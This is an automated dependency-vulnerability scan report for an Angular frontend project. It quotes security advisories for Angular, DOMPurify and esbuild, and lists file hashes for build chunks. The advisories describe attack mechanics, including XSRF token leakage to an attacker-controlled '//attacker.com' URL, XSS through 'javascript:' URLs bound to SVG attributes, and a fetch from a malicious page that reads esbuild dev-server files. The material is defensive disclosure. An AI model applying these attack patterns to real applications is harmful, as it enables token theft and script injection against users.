Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.
Summary of Vulnerable Dependencies
File Path: /builds/pub/numeco/misis/misis-frontend/package-lock.json?@angular/common
Referenced In Project/Scope: package-lock.json: transitive
The vulnerability is a **Credential Leak by App Logic** that leads to the **unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token** to an attacker-controlled domain. Angular's HttpClient has a built-in XSRF protection mechanism that works by checking whether a request URL starts with a protocol (`http://` or `https://`) to determine if it is cross-origin. If the URL instead starts with a protocol-relative prefix (`//`), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the `X-XSRF-TOKEN` header.

### Impact

The token leakage completely bypasses Angular's built-in CSRF protection, allowing an attacker to capture the user's valid XSRF token. Once the token is obtained, the attacker can perform arbitrary Cross-Site Request Forgery (CSRF) attacks against the victim user's session.

### Attack Preconditions

1. The victim's Angular application must have **XSRF protection enabled**.
2. The attacker must be able to make the application send a state-changing HTTP request (e.g., `POST`) to a **protocol-relative URL** (e.g., `//attacker.com`) that they control.

### Patches

- 19.2.16
- 20.3.14
- 21.0.1

### Workarounds

Developers should avoid using protocol-relative URLs (URLs starting with `//`) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single `/`) or as fully qualified, trusted absolute URLs.

CWE-359 Exposure of Private Personal Information to an Unauthorized Actor, CWE-201 Insertion of Sensitive Information Into Sent Data
Vulnerable Software & Versions (NPM):
File Path: /builds/pub/numeco/misis/misis-frontend/package-lock.json?@angular/compiler
Referenced In Project/Scope: package-lock.json: transitive
A Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular's internal sanitization schema fails to recognize the `href` and `xlink:href` attributes of SVG `<script>` elements as a **Resource URL** context. In a standard security model, attributes that can load and execute code (like a script's source) should be strictly validated. However, because the compiler does not classify these specific SVG attributes correctly, it allows attackers to bypass Angular's built-in security protections.

When template binding is used to assign user-controlled data to these attributes (for example, `<script [attr.href]="userInput">`), the compiler treats the value as a standard string or a non-sensitive URL rather than a resource link. This enables an attacker to provide a malicious payload, such as a `data:text/javascript` URI or a link to an external malicious script.

### Impact

When successfully exploited, this vulnerability allows for **arbitrary JavaScript execution** within the context of the victim's browser session. This can lead to:

- **Session Hijacking:** Stealing session cookies, localStorage data, or authentication tokens.
- **Data Exfiltration:** Accessing and transmitting sensitive information displayed within the application.
- **Unauthorized Actions:** Performing state-changing actions (like clicking buttons or submitting forms) on behalf of the authenticated user.

### Attack Preconditions

1. The victim application must explicitly use SVG `<script>` elements within its templates.
2. The application must use property or attribute binding (interpolation) for the `href` or `xlink:href` attributes of those SVG scripts.
3. The data bound to these attributes must be derived from an untrusted source (e.g., URL parameters, user-submitted database entries, or unsanitized API responses).

### Patches

- 19.2.18
- 20.3.16
- 21.0.7
- 21.1.0-rc.0

### Workarounds

Until the patch is applied, developers should:

- **Avoid Dynamic Bindings**: Do not use Angular template binding (e.g., `[attr.href]`) for SVG `<script>` elements.
- **Input Validation**: If dynamic values must be used, strictly validate the input against an allowlist of trusted URLs on the server side or before it reaches the template.

### Resources

- https://github.com/angular/angular/pull/66318

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Vulnerable Software & Versions (NPM):
A **Stored Cross-Site Scripting ([XSS](https://angular.dev/best-practices/security#preventing-cross-site-scripting-xss))** vulnerability has been identified in the **Angular Template Compiler**. It occurs because the compiler's internal security schema is incomplete, allowing attackers to bypass Angular's built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain [`javascript:` URLs](https://developer.mozilla.org/en-US/Web/URI/Reference/Schemes/javascript)) as requiring strict URL security, enabling the injection of malicious scripts.

Additionally, a related vulnerability exists involving SVG animation elements (`<animate>`, `<set>`, `<animateMotion>`, `<animateTransform>`). The `attributeName` attribute on these elements was not properly validated, allowing attackers to dynamically target security-sensitive attributes like `href` or `xlink:href` on other elements. By binding `attributeName` to "href" and providing a `javascript:` URL in the `values` or `to` attribute, an attacker could bypass sanitization and execute arbitrary code.

Attributes confirmed to be vulnerable include:

* SVG-related attributes (e.g., `xlink:href`), and various MathML attributes (e.g., `math|href`, `annotation|href`).
* The SVG animation `attributeName` attribute when bound to "href" or "xlink:href".

When template binding is used to assign untrusted, user-controlled data to these attributes (e.g., `[attr.xlink:href]="maliciousURL"` or `<animate [attributeName]="'href'" [values]="maliciousURL">`), the compiler incorrectly falls back to a non-sanitizing context or fails to block the dangerous attribute assignment. This allows an attacker to inject a `javascript:` URL payload. Upon user interaction (like a click) on the element, or automatically in the case of animations, the malicious JavaScript executes in the context of the application's origin.

### Impact

When exploited, this vulnerability allows an attacker to execute arbitrary code within the context of the vulnerable application's domain. This enables:

* **Session Hijacking:** Stealing session cookies and authentication tokens.
* **Data Exfiltration:** Capturing and transmitting sensitive user data.
* **Unauthorized Actions:** Performing actions on behalf of the user.

### Patches

- 19.2.17
- 20.3.15
- 21.0.2

### Attack Preconditions

* The victim's Angular application must render data derived from **untrusted input** (e.g., from a database or API) and bind it to one of the unsanitized URL attributes or to the `attributeName` of an SVG animation element.
* The victim must perform a **user interaction** (e.g., clicking) on the compromised element for the stored script to execute, or the animation must trigger the execution.

### Workarounds

If you cannot upgrade, you can work around the issue by ensuring that any data bound to the vulnerable attributes is never sourced from untrusted user input (e.g., database, API response, URL parameters).

* **Avoid Affected Template Bindings:** Specifically avoid using template bindings (e.g., `[attr.xlink:href]="maliciousURL"`) to assign untrusted data to the vulnerable SVG/MathML attributes.
* **Avoid Dynamic `attributeName` on SVG Animations:** Do not bind untrusted data to the `attributeName` attribute of SVG animation elements (`<animate>`, `<set>`, etc.).
* **Enable [Content Security Policy (CSP)](https://angular.dev/best-practices/security#content-security-policy):** Configure a robust CSP header that disallows `javascript:` URLs.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Vulnerable Software & Versions (NPM):
File Path: /builds/pub/numeco/misis/misis-frontend/package-lock.json?@angular/core
Referenced In Project/Scope: package-lock.json: transitive
A Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular's internal sanitization schema fails to recognize the `href` and `xlink:href` attributes of SVG `<script>` elements as a **Resource URL** context. In a standard security model, attributes that can load and execute code (like a script's source) should be strictly validated. However, because the compiler does not classify these specific SVG attributes correctly, it allows attackers to bypass Angular's built-in security protections.

When template binding is used to assign user-controlled data to these attributes (for example, `<script [attr.href]="userInput">`), the compiler treats the value as a standard string or a non-sensitive URL rather than a resource link. This enables an attacker to provide a malicious payload, such as a `data:text/javascript` URI or a link to an external malicious script.

### Impact

When successfully exploited, this vulnerability allows for **arbitrary JavaScript execution** within the context of the victim's browser session. This can lead to:

- **Session Hijacking:** Stealing session cookies, localStorage data, or authentication tokens.
- **Data Exfiltration:** Accessing and transmitting sensitive information displayed within the application.
- **Unauthorized Actions:** Performing state-changing actions (like clicking buttons or submitting forms) on behalf of the authenticated user.

### Attack Preconditions

1. The victim application must explicitly use SVG `<script>` elements within its templates.
2. The application must use property or attribute binding (interpolation) for the `href` or `xlink:href` attributes of those SVG scripts.
3. The data bound to these attributes must be derived from an untrusted source (e.g., URL parameters, user-submitted database entries, or unsanitized API responses).

### Patches

- 19.2.18
- 20.3.16
- 21.0.7
- 21.1.0-rc.0

### Workarounds

Until the patch is applied, developers should:

- **Avoid Dynamic Bindings**: Do not use Angular template binding (e.g., `[attr.href]`) for SVG `<script>` elements.
- **Input Validation**: If dynamic values must be used, strictly validate the input against an allowlist of trusted URLs on the server side or before it reaches the template.

### Resources

- https://github.com/angular/angular/pull/66318

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Vulnerable Software & Versions (NPM):
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-2DUT3MBC.js
MD5: fb0d87e3be7fdaa4ff7a6e5c5dede227
SHA1: 93e3f8d34d84aad8a4f85b318e859c21294ae8f5
SHA256:2693595d264004517cc9841e2363d05bc174f080e7d429e1e5265e4443cf5bff
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-3W5DFRBO.js
MD5: c286e4638c4f493da8b0a1cf5895a678
SHA1: b29b56e2734c807f252b565b2ee4dc2493d154ff
SHA256:0e9e24b8137d25268a61aabdfa2689f5a9097342c8c3dcd26f4d14a31d5c08b2
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-4IDNTCH7.js
MD5: 492248c6fedb4bedf5cd3fad8a41ea11
SHA1: 55353524914d21fc0e9f257a184a66e06fc4e304
SHA256:10b852d2b3bb8e267c036324b7123aeec82d3cd34252db7bff6c6527bb52d452
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-5CPB2O4U.js
MD5: ed73d516ed966a8f1ab7e485e021c676
SHA1: 40c2217431d4b61f75be9865b9fb7a75c90c0e47
SHA256:89ebc45ee1f6a4978f7b716a2c05fe16ce4c11dbb2a28cecd038783e2ae07366
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-5LIKHIMW.js
MD5: 447d03cfcf26bb29e33723014ec6ad09
SHA1: 2e92ea6c26cfe831c7261ccfe57b2c97f0334381
SHA256:2e6a216f857e02462f2c709c263259700253e6fb413905728dbb676089f57060
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-5XG6ZEPE.js
MD5: 7d84140ff92a224219f4a45d68e0a828
SHA1: 815ba214dfe9343878d895db74bc780e0ef68d8d
SHA256:3530207f138c4e94652b531d4c5262a4e0e34c59acaa70b83ed4dffaabd28c96
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-65Y3UMUB.js
MD5: cb7023806a978a8537a9af2aa52bdb02
SHA1: 40a7fbeee2af1efefc67d570c2ff11279e821140
SHA256:e2729471c61bb00303297f6138fd422c5f1ea23fe468cd4249533b15d6ebe4f3
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-7AWS35PM.js
MD5: badc9f2bdbe1ddcee43597b134122462
SHA1: 3b471a3e71b1f8aa8a5b1443ffa4a43bd9b4b84d
SHA256:c28f81b49aa3c9ae9259003921e0d4380bd7d81943f10eca16fddabeed5eef76
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-7Y2OR5ZR.js
MD5: ae8aad1b717af8590b2972196d3f2ad7
SHA1: 163a11dfa36f9a50098977ed91eb9c45209bfb16
SHA256:c4c43c826f42bc8355dd1919016cb7775e66ca0a400b58adea2e40e23cd246b2
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-AQVCEH2G.js
MD5: 4c82c1967f07e80389fe9a6cb9f62ab6
SHA1: db1dc07a951e5c469aa193ba4943441683c42e0b
SHA256:c56e4656f69ca2ecb05d0e3e55fe8ddf4b695f1323ed81a94086725cbda6b60d
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-AYB3SWWS.js
MD5: a0027daad130388cd7f4299508914401
SHA1: 8a8f298063ac044cfd18a586a490b1366d2fe782
SHA256:a4a23cd5b5b5f27e78a99675f4590e4968d7eba12556b21672370c76cd08f190
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-BG6VN43N.js
MD5: 9d1f2542dee7be988e6a7c53540ba996
SHA1: 6b5b6a858402168858261e59e37b5c5456ad81d5
SHA256:d69fef67a7b52b0ffac01331ef77e5a05866776d51cd1e279b87a102d55c53b6
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-BKVONTPZ.js
MD5: 612912a374409b0211114148aec49d7f
SHA1: 309921b80cae978fd10ba7bdca7091c42b87afd5
SHA256:eec96817467b05464b2547da6e97ed17879805f00bcf18e073cb9b18d50e0c82
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-BLSEQJXN.js
MD5: 6861b19caed1127f6c74d39e439609d9
SHA1: bed4e94d2cb625359d3c6b1cd7f075da89de5e7a
SHA256:67a55bc7e12f58660fb7df47315967c0809d6c87eb26fbf802a1ae261abb5e7b
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-CQZ3LGC7.js
MD5: 0f1f2830b3220215e673a03e01d6bc2a
SHA1: 136ccc069006cda89cc7823bccd3895977cd6875
SHA256:9aeab1babe3eab0cd786d6d45d0b918440c944f7589253a1a583a69c0f501510
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-DP4F5TQA.js
MD5: 9204c168d2dd7f3887c241ce540df6fd
SHA1: e160caa379daba2fd8dc649bd275a5438d7370e8
SHA256:498da39df825ce7de8ee3d16ed7ea119fe1fd7dc1af3882b37c056f79fd6e705
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-F6CQSYC3.js
MD5: 1ce61187c4b6f23beef7689ea1efe093
SHA1: 8911623aa8c922dcbf68f40a993e168f1e4d4c94
SHA256:56b6a426f168c159400b3b389664f064e26b7689c328c578f78a671a05e8ea02
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-FK6H3RFT.js
MD5: 3180b362432ae8ddafb28a3ddb10d0bf
SHA1: 3c538698719f1cf34410542b8c702bc484e025ee
SHA256:e4ae3fe180204606215dd6a440d58a5c976c844a789b37d27d655c5e57420bc8
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-FLDNX5CL.js
MD5: ace32284f13f2fb736bdb0482b617c1f
SHA1: 96bd013c28bbe9b3dd6003f4565ba109f9adf0d1
SHA256:24fee88accd0d81d04121e980d01c0fb7c4dd3ebc92ab7108191cb105bc0e3d1
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-GB6G3STS.js
MD5: a8df04d165fc53b4d1d9680996d08dcd
SHA1: f4e8d30a0a283c92eac99e52340961c37447d591
SHA256:f90af0d95babbcf1be3d51a7adc32a7e19a22eed9bf50104745b054e1bfdadd2
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-GU75W6YL.js
MD5: 72bbe07aaa98068cce366babcfa688a5
SHA1: 11f1c2636230944b868f50717aa755c0c33a0824
SHA256:0a26e9d7ab8e36220b1c601af707eb3de4810bf9aba069cc0bcf9abea5e076fc
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-H7ENNXHV.js
MD5: 15158c03bd3d91b3afa6bab47133f7fc
SHA1: 3d22e377c8a16577ba72dfe96981cf2b4df96d37
SHA256:9b1768c04ea190bc6569859199d3781e532280410947601f6c5411d1b775e804
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-HGBULXKF.js
MD5: a9420e3edc78a6672ff6a4c7a0a5af71
SHA1: 6f6f31265de62a86e28b055f931ef16913afc7ca
SHA256:451c5532f26a1056c8b6fe24500f52a22921a0f8ca6cc66d546afe616e6cf1a3
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-HVZJFDNV.js
MD5: 79359f7e9df647c7cda9a19028fed3cc
SHA1: 3677cc0764d0721213711b7d38d2448ee8341ff4
SHA256:5d92e66cdc952d334dc85223855a1df67c06d531ee005497c2cefc189b58acf2
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-I46VRRDT.js
MD5: 2d2d068c2b1759cb2b6ce0dea3a186c4
SHA1: 1984efbbbb65c61a9ea1c5d383e21ff06dfd33d7
SHA256:b82a54b9ccc44a086e531df437ca67339253f11dda6feae26e3aace96284047b
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-IAT6B3MN.js
MD5: 2c2c9399108d45286ef1e063db22e7b8
SHA1: 33800b6cad9d6d778207a1e81dccb5b06a9a1eee
SHA256:7bbbf9c280cefc748774a32b99132c852a346bdeb75186c84b16afed486734a9
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-IHVYAHLJ.js
MD5: 3cc84cdad116063b767627524e97d9ca
SHA1: 041e35bfe5c3bea17da145adda9e21a5099743e5
SHA256:6a6f7f224829d637c34814c122fd0ca935632c40b76b500161400f8c1d3895ef
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-JOZPUFRT.js
MD5: d3df36474c6213d7062f4682f486ce50
SHA1: 0bb444cef83065c9dbdfad5bfbad9db088e5250b
SHA256:ffd7ea3bfd40f86e2d63b34a8aca29ad425ea209fcc121c168395210ef1b7c67
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-JWR5PHCO.js
MD5: 3edafa5d85c8ca7ee5cfbbed2bc39b94
SHA1: e40d7994c5e18d471f20e740c11613ad35e2604e
SHA256:f0c3a7c3f86417ae1a90495f09a932de08d407fd03ee72d688b3c93dbc360b7b
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-KNNTOBUQ.js
MD5: c679417262f1b7a727d52007f124bdd3
SHA1: a2fc7534285f02534bc0cc6b213489e2b33576c1
SHA256:5f3e7a4c0710a74ffe47bba89f007a3787840d735789b210e2ea4285c83eb3b6
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-KWK3HKEC.js
MD5: d6b8e5c843e978f4f415c03cce1fa21c
SHA1: ac2e6456810dca27053de6aa0ebbb102dddcf462
SHA256:f2d97620e253211ced49a910a6f59ca2bdbfd7f9eaf4c7c032bc0a45cb00824b
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-LALFTQDI.js
MD5: caa7cb08328ce7400d87968f67f6100a
SHA1: 29bbadbaa0dd4a20f3bae68158aa132e4db6a2e5
SHA256:d4ad61af2cf9da5dbfc907e88df34305db6d200be7d19b22f154566940218ef0
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-LR2MFQOX.js
MD5: c8bde748e2737d4e1363d65bc51035ae
SHA1: 5436ab00c2f83fbda3fd1b3502416f86ae0876c9
SHA256:97f27af2bff73141c0b365963f05d34a13c1d6e5edeaa7f9f7553d876781c3f5
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-LYJBRVOP.js
MD5: 96c55863f9694a5e25d6e05bb4b4b127
SHA1: 4ba528ba3d4752c09c448689249bfb8a28ffae49
SHA256:500aa2c2784160c5e34ea7eb3de59eb2ea1727dc2e38e180e470747933aab979
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-M6DNAWLE.js
MD5: 4f53aa32c3fd6f2997d15955600ad852
SHA1: e1287a8ed39631ce50e688e1d67f76ad8a0b18e8
SHA256:244ad08886e5fbc89860e1057e2275769fcc906abd5f40583cd1d852521d96d0
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-MAF72MTU.js
MD5: 9a499213df1e36163ae50adb148303c6
SHA1: 8fc3e268168f1339c463ab1bc31e68b1386660e9
SHA256:41626f0047864e2ce105dc2043a8e9aea45a45cab954f866a1cb6f06d06d1a92
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-MMKHBAMC.js
MD5: 2ceeace9d51e45ac035f02c95caf2869
SHA1: dc8ed1c19e4c70b78c834fa75e440569dc7c2ec3
SHA256:d9ae060ea0569d17cf879a8bbaf199f7f7113762f1770dc628bb6cd8f31cdbc2
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-MRSFLZJS.js
MD5: eb02180fab6625e74bccc9762a0b4694
SHA1: 28af92543968773cb81c02031bed3ab740890903
SHA256:c9c02b45279b180f9ee06689d1afc948bd00eb5f8c574d52cab14dfb60b825cb
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-NN6GAZ3B.js
MD5: 9c5dd3f12cd4bed59fdd99981801de69
SHA1: 2a4d2f0603d5832a12b30a3e952c3d22f2cf6ffa
SHA256:88b3d2974f7b72cffb7eed621414cc1c0009869a4b6b68ce2d5eeb38a3f75bed
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-P3UWLXGI.js
MD5: df881c673cf51d3a3aee6d6e9e2353f2
SHA1: 73ed4c31aecfccd829a0b8a4a237ddb7bf0efff8
SHA256:6477ba72b16156c966ecdb5db80cd5257de2d9f375d7a1818982757ced05ae2c
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-PCRZMXVQ.js
MD5: def2b1bbf445218cd5bdd0f0ccd54f40
SHA1: 11c965fe1f69daa969b679d18bfb2c3a97b1fb61
SHA256:adfb423ae8a792c122a4669f275378f77cc16232518d67b85f4fe98e5e14549e
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-PYZZLTBQ.js
MD5: 80df5c596ce45d316be16f3647db069b
SHA1: 48c8a4010f4e843edb7a9acfd3c365bd2bee6d98
SHA256:e4105e552ecaaf57a1fca5d0ce06781390769fed25950c7dbad6f840121427a4
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-Q6GD6NEO.js
MD5: 6ba5831757c18fcd75ef5bc0668a0809
SHA1: 750b41f6809603ea940528a403b9a1f1e3c791e1
SHA256:56baaf1a1cdc3cbbf736dfe2637e9cf3facee6f712f40111319c1b5569d2485b
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-QEGSHAMZ.js
MD5: f4acfe17bcb08aecdd0c5b566c793734
SHA1: 114025917ca84f0baec5231f24f980775c68ef45
SHA256:dcd296ae023c9f468b6fc0efc2b8addba709ed450598711c50de7e9b4782c283
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-QWE6RDH2.js
MD5: fa73a667cf88b847ee8c66de52497fe2
SHA1: 828185c23788bd72a58a7742f8ed8820190a81b1
SHA256:12e0ca67a567b3bd0b5b04bbb8bdb13d71855980a4ed6c85db7b377b1c0e7a5f
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-RAGU6YDF.js
MD5: c3ba315b36d6b20150da94cbe71f4e05
SHA1: ca45fc48e8905fc1f469103f168bb57cd4fef254
SHA256:92a572ef1a31e2c329f29ba37f596fb47c5dd619f1c2789b95846c5e6507eda6
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-SFM3UAUU.js
MD5: c235c3755da4044ab11e85a392ba8882
SHA1: ce3120944a2fce67656755405ff8315142a2c7f6
SHA256:b2f5f3199c759d3304ae5132f05ed0f2fa0e46d45c9e1f2227bbcc3e03800cea
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-SS3AZUBG.js
MD5: a50bb46f36f7cac1ccbc420f9d269503
SHA1: 2459e7c50b999979d98329cabc29e6fee8a0d4f1
SHA256:dd03a5f69cf8395d0093f61b66cb9a7c39e1f77fa1fad06da695ee13d2b98af0
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-TA5GG3BA.js
MD5: 8b7e17f5852c98ba77364aafcfdc0986
SHA1: f696c6b4c9d7d35c9484400bababeba014cf9d92
SHA256:abd264ac63672c9caeb57374694f6b25ee5b7ed45035c5919964e5624a6fc979
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-TC6IYJRI.js
MD5: 769ec650e7518bbe77b87bca9325d88b
SHA1: e8d0a2eef0a4c0b96e025e2e3bc1de1bd9e02915
SHA256:d2e1aa11c63f8e8ca811379de61b6dbd44e3b24159653b85fa7fcdf58a7513d6
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-TRL56STW.js
MD5: bc2d69c278a4655b6332eea43059b908
SHA1: 69dee548bfb93e2b858fd523434a6585c80bfc95
SHA256:6c34b45c41f218e4457bd25ede4906cc56a8bc59b66bfad713fd94211195a441
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-UJRMHFDQ.js
MD5: 32c27a2f7a64858411fe8ddd90d7ca71
SHA1: ef04f9339ca4a12bb607ec054040f11d3ad1790c
SHA256:aa0c5b2746c7aeafa6da6b3bc7f8055dadf93ba6503c687345e6e4eb97be0248
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-VICLOYEK.js
MD5: 537b7efae7e9192ba373f0274483ffdd
SHA1: 3042b96efc4ff6416ed6d98cb6f2e996adc959df
SHA256:a220ef5398f556ede663df701e4115f3b83facd9623288bd55f9bb2b994b05dc
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-VNT7D2D2.js
MD5: 0ef9192d9c54d09729a3f6b62c958b10
SHA1: 41c6373f98fc57a7eb895df268ddb2a82a663941
SHA256:ed760aa80dbb2d898f02d8d4a6aa02b43578f55ccd24027c3816df260814405a
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-WFGPIVU6.js
MD5: 27f24c5357b958645b953ad5c00b4603
SHA1: 82c44cdbac9c1d58702fb4a0267ee3635a1636c2
SHA256:2b2b699d5384d6283e3b93416e42c546aa35385a1023638e8f5a4df36056d7fe
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-WFMBOKO4.js
MD5: be03f7aedf2b0db4822d7408656c9cb4
SHA1: 72208e3a0f85c79ac6bab9411ccfe626eb9af1ef
SHA256:1cf032552fbc8a9466f20dab2fc1f2b0d302262000134b75f2ee9edf77f9b706
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-WHSEWC2X.js
MD5: abb3eb5bf5697478241b57dbfdcdc859
SHA1: 0ab9775c929a4f1934a9fef8a7f0a030a6e59609
SHA256:6ebc6951afcfa4b33d2a335ceabe2d36d63a7d380864290e2e58b3878b0dbe3b
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-X2PAP63A.js
MD5: b36dccd4f92526fedd39ddaf7fc413f6
SHA1: 9b005b7720bbf3868498876c6972aa0663795cda
SHA256:e9a341f9c422cd85f9ed46b3af654bdcd8d659081d4581eddc0771a290355128
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-XHQOCZFE.js
MD5: 2055a32e84af34a9dc1c280703416db2
SHA1: 31a52b4a534a4271f5c5d3069bc3449d1f123323
SHA256:b48cb0510d3c617f7210369499bb4f289dbe29407d063dc92fb004b5a75ea545
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-XNWEUM6Z.js
MD5: f07f644262f2afbf620c771fa1c24fb9
SHA1: 918dc841170ebbe6ec7891ddd716d393da382458
SHA256:58d2cefd4b9dea8b5cf53c1cee4665fd78568aa76dfc2f99558a40c6fe5601db
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-YWAL7HVF.js
MD5: c2761228e2fc3d82975d4bd1e137ad8e
SHA1: c7c08cf456fdfd461cfa5b00c792f1b3dd8e06a9
SHA256:1fc15c4815f2bfbd744aba998603449310caa2b0fcd65a51d8f5319ffc1df494
File Path: /builds/pub/numeco/misis/misis-frontend/dist/misis-frontend/browser/chunk-ZJZYNOQG.js
MD5: 70e851b1148c5799bcf7b7c04de1bc60
SHA1: 53e9888d2c589f87fb13d6384a643d36d27a50cb
SHA256:58d25088397042939b3c777aec6376e527ebebe8b642bd98d09975b55e961d25
DOMPurify before 3.2.4 has an incorrect template literal regular expression, sometimes leading to mutation cross-site scripting (mXSS).

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Vulnerable Software & Versions (NVD):
File Path: /builds/pub/numeco/misis/misis-frontend/src/assets/custom.js
MD5: b76a4710138519044113c0901bed4886
SHA1: 3ca657331ee0ebf8487d1b76bbdb9f715044e75b
SHA256:d046e704784bdaba7948a66d7842b3e092da01baaffbde1851f42e233f68c21e
File Path: /builds/pub/numeco/misis/misis-frontend/package-lock.json?esbuild
Referenced In Project/Scope: package-lock.json: transitive
### Summary
esbuild allows any websites to send any request to the development server and read the response due to default CORS settings.
### Details
esbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.
https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121
https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363
**Attack scenario**:
1. The attacker serves a malicious web page (`http://malicious.example.com`).
1. The user accesses the malicious web page.
1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request via JS in that malicious web page. This request is normally blocked by the same-origin policy, but that is not the case here for the reasons above.
1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.
In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by
- Fetching `/index.html`: normally you have a script tag here
- Fetching `/assets`: it's common to have an `assets` directory when JS files and CSS files live in a separate directory, and the directory listing feature tells the attacker the list of files
- Connecting to the `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when a file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`)
- Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file
